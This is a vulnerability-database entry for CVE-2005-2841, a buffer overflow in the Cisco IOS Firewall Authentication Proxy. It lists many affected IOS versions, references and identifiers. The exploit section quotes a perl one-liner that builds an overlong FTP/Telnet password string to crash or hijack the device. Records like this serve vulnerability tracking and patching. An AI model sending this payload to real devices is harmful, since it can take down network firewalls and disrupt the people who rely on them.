ID
VAR-E-200509-0195
CVE
cve_id: | CVE-2005-2841 | Trust: 1.6 |
EDB ID
26233
TITLE
Cisco IOS 12.x - Firewall Authentication Proxy Buffer Overflow - Hardware dos Exploit
Trust: 0.6
DESCRIPTION
Cisco IOS 12.x - Firewall Authentication Proxy Buffer Overflow. CVE-2005-2841CVE-19227 . dos exploit for Hardware platform
Trust: 0.6
AFFECTED PRODUCTS
vendor: | cisco | model: | ios 12.3 | scope: | ne | version: | - | Trust: 2.1 |
vendor: | cisco | model: | ios | scope: | eq | version: | 12.x | Trust: 1.0 |
vendor: | cisco | model: | ios 12.4t | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.4mr | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios | scope: | eq | version: | 12.4 | Trust: 0.3 |
vendor: | cisco | model: | ios 12.3yw | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.3yu | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.3yt | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.3ys | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.3yq | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.3yk | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.3yj | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.3yi | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.3yg | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.3yf | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.3yd | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.3ya | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.3xy | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.3xw | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.3xu | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.3xs | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.3xr | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.3xq | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.3xm | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.3xl | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.3xk | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.3xj | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.3xi | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.3xh | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.3xg | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.3xf | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.3xe | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.3xd | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.3xc | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.3xb | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.3xa | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.3t | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.3jk | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.3ja | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.3bw | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.3bc | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.3b | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios | scope: | eq | version: | 12.3 | Trust: 0.3 |
vendor: | cisco | model: | ios 12.2zl | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.2zf | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.2sxf | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.2sh | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.2sg | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.2sec | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.4 t | scope: | ne | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.4 mr | scope: | ne | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios | scope: | ne | version: | 12.4(1) | Trust: 0.3 |
vendor: | cisco | model: | ios 12.3 bc7 | scope: | ne | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.3 yi1 | scope: | ne | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.3 yg2 | scope: | ne | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.3 t9 | scope: | ne | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.3 xr4 | scope: | ne | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.3 xi4 | scope: | ne | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.3 t10 | scope: | ne | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.3 ja | scope: | ne | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.3 xk4 | scope: | ne | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.3 xg5 | scope: | ne | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.3 xe4 | scope: | ne | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.3 xc3 | scope: | ne | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.3 xa5 | scope: | ne | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.3 jk | scope: | ne | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios | scope: | ne | version: | 12.3(15) | Trust: 0.3 |
vendor: | cisco | model: | ios 12.3 yu | scope: | ne | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.3 yt | scope: | ne | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.3 yq | scope: | ne | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.3 t2 | scope: | ne | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.3 yw | scope: | ne | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.3 ys | scope: | ne | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.3 yk1 | scope: | ne | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.3 yf2 | scope: | ne | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.3 xl3 | scope: | ne | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.3 t6 | scope: | ne | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ios 12.2 zh8 | scope: | ne | version: | - | Trust: 0.3 |
EXPLOIT
source: https://www.securityfocus.com/bid/14770/info
Cisco IOS Firewall Authentication Proxy is prone to a buffer overflow condition. Successful exploitation of this issue could cause a denial of service or potential execution of arbitrary code.
This issue affects the FTP and Telnet protocols, but not HTTP.
perl -e 'print "pass "; print "A" x 51; print "@ \n";'
Trust: 1.0
EXPLOIT LANGUAGE
txt
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Firewall Authentication Proxy Buffer Overflow
Trust: 1.0
CREDITS
Markus
Trust: 0.6
EXTERNAL IDS
db: | BID | id: | 14770 | Trust: 1.9 |
db: | NVD | id: | CVE-2005-2841 | Trust: 1.6 |
db: | EXPLOIT-DB | id: | 26233 | Trust: 1.6 |
db: | EDBNET | id: | 48220 | Trust: 0.6 |
REFERENCES
url: | https://nvd.nist.gov/vuln/detail/cve-2005-2841 | Trust: 1.6 |
url: | https://www.securityfocus.com/bid/14770/info | Trust: 1.0 |
url: | https://www.exploit-db.com/exploits/26233/ | Trust: 0.6 |
url: | http://www.cisco.com/warp/public/707/cisco-sa-20050907-auth_proxy.shtml | Trust: 0.3 |
url: | http://lists.darklab.org/pipermail/darklab/2005-october/000068.html | Trust: 0.3 |
url: | http://www.cisco.com/public/sw-center/sw-ios.shtml | Trust: 0.3 |
SOURCES
db: | BID | id: | 14770 |
db: | EXPLOIT-DB | id: | 26233 |
db: | EDBNET | id: | 48220 |
LAST UPDATE DATE
2022-07-27T09:14:14.787000+00:00
SOURCES UPDATE DATE
db: | BID | id: | 14770 | date: | 2005-09-07T00:00:00 |
SOURCES RELEASE DATE
db: | BID | id: | 14770 | date: | 2005-09-07T00:00:00 |
db: | EXPLOIT-DB | id: | 26233 | date: | 2005-09-07T00:00:00 |
db: | EDBNET | id: | 48220 | date: | 2005-09-07T00:00:00 |